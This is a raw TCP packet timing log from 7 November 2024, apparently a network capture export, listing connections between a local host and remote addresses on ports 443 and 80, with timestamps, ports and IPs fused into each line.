                                                                                                              Nov 7, 2024 12:49:04.264308929 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:04.264369011 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:04.264378071 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:04.264425993 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:04.264930010 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:04.264993906 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:04.265170097 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:04.267961025 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:04.268106937 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:04.268455982 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:04.268557072 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:04.487795115 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:04.800314903 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:05.311511993 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.311598063 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:05.311707973 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.311899900 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.311944962 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:05.312645912 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.312700987 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:05.313863039 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.313873053 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.316618919 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:05.321410894 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.438182116 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.438205957 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.438261986 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:05.438631058 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.439472914 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.439541101 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:05.439563036 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.442754030 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:05.443474054 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:05.443960905 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:05.444789886 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:05.445571899 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.445632935 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:05.447570086 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.447607040 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:05.448810101 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.448820114 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.449666977 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.452485085 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.572726965 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.574007034 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.574071884 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.574115038 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:05.574268103 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.575371981 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:05.575973034 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.577301025 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:05.577577114 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:05.577822924 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:05.578493118 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:05.579560995 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:05.582268000 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.582463980 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.583081961 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.583256960 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.584340096 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.711971998 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.711990118 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.712120056 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:05.712719917 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.712806940 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.714986086 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.715044975 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:05.732233047 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:05.732319117 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:05.732777119 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:05.733094931 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:05.733423948 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:05.737245083 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.737647057 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.737874031 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.738219976 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.861896992 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.861920118 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.861938953 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.861994028 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:05.862298965 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.862935066 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.863003969 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:05.863270044 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.863337040 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:05.865930080 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:05.866023064 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:05.866796017 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:05.866926908 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:05.867244005 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:05.870821953 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.871670961 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.871757984 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:05.871999979 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.003243923 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.003267050 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.003282070 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.003377914 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.003395081 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.003485918 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.004004002 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.004349947 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.007291079 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.186400890 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.186860085 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.188250065 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.189105034 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.189811945 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.191225052 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.191632986 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.193053961 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.193923950 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.194730997 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.315690041 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.315716982 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.315807104 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.316953897 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.317179918 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.318860054 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.318926096 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.319005966 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.319185019 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.319880962 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.321774960 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.321784973 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.323941946 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.324701071 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.326814890 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.447968006 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.447983027 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.448049068 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.448175907 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.449331045 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.449397087 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.450448036 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.450943947 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.450990915 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.466721058 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.471695900 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.473685026 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.474941969 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.476156950 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.477375984 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.478532076 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.479829073 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.480963945 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.482177019 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.605506897 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.605537891 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.605598927 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.605882883 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.605926991 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.605982065 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.606878996 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.610702038 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.610812902 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.611824989 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.612576008 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.612879992 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.615513086 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.615649939 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.616652012 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.617319107 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.617623091 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.739435911 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.739468098 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.739545107 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.740195036 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.741080046 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.741134882 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.741300106 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.742033958 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.742078066 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.782108068 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.786906004 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.789041042 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.790111065 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.792028904 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.793406963 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.793919086 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.794887066 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.797039032 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.798401117 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.918730974 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.918926954 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.919011116 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.919378042 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.921035051 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.921116114 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.922358990 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.929044962 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.929945946 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.931415081 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.932838917 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.933938980 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.935626030 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:06.935647011 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.936239958 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.937680006 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:06.940395117 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.058054924 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.059273958 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.059336901 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.059672117 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.061393976 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.061449051 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.063877106 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.065078020 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.065779924 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.070611000 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.110301018 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.111753941 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.112751961 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.115156889 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.116638899 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.117490053 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.195012093 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.195396900 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.195470095 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.198210955 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.199120998 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.203170061 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.203938007 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.247033119 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.247123003 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.247174025 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.247181892 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.247680902 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.247742891 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.249988079 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.251044035 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.251339912 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.254852057 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.255817890 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.256155968 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.331027031 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.331038952 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.331094980 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.331710100 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.371529102 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.372601986 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.376331091 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.377368927 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.379201889 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.380131006 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.380225897 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.380851030 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.382152081 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.384454012 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.385297060 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.389272928 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.431684017 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.500463009 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.500981092 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.501046896 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.505448103 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.508727074 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.510338068 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.511429071 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.512723923 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.512778044 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.513709068 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.533713102 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.553622007 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.553733110 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.558892965 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.599688053 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.634485006 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.637345076 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.637403965 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.662936926 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.681515932 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.682265997 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.684701920 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.686748981 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.686762094 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.686774015 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.686824083 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.686866045 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.689944983 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.690125942 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.724505901 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.729552984 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.811295986 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.811578989 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.811645985 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.811697960 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.814342976 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.814403057 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.814414978 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.814450979 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.814450979 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.815150023 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.815469980 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.819657087 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.819668055 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.819726944 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.819726944 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.820339918 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.821115017 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.822992086 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.827852011 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.856108904 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.887475967 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.935653925 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.943784952 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.947841883 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.948201895 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.949234962 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.951718092 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.951780081 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.988646984 CET4971380192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:07.990669012 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:07.994436026 CET8049713158.101.44.242192.168.2.12
                                                                                                              Nov 7, 2024 12:49:07.994522095 CET4971380192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:07.994718075 CET4971380192.168.2.12158.101.44.242
                                                                                                              Nov 7, 2024 12:49:07.996649027 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:08.001019955 CET8049713158.101.44.242192.168.2.12
                                                                                                              Nov 7, 2024 12:49:08.001368046 CET49709443192.168.2.1213.107.246.45
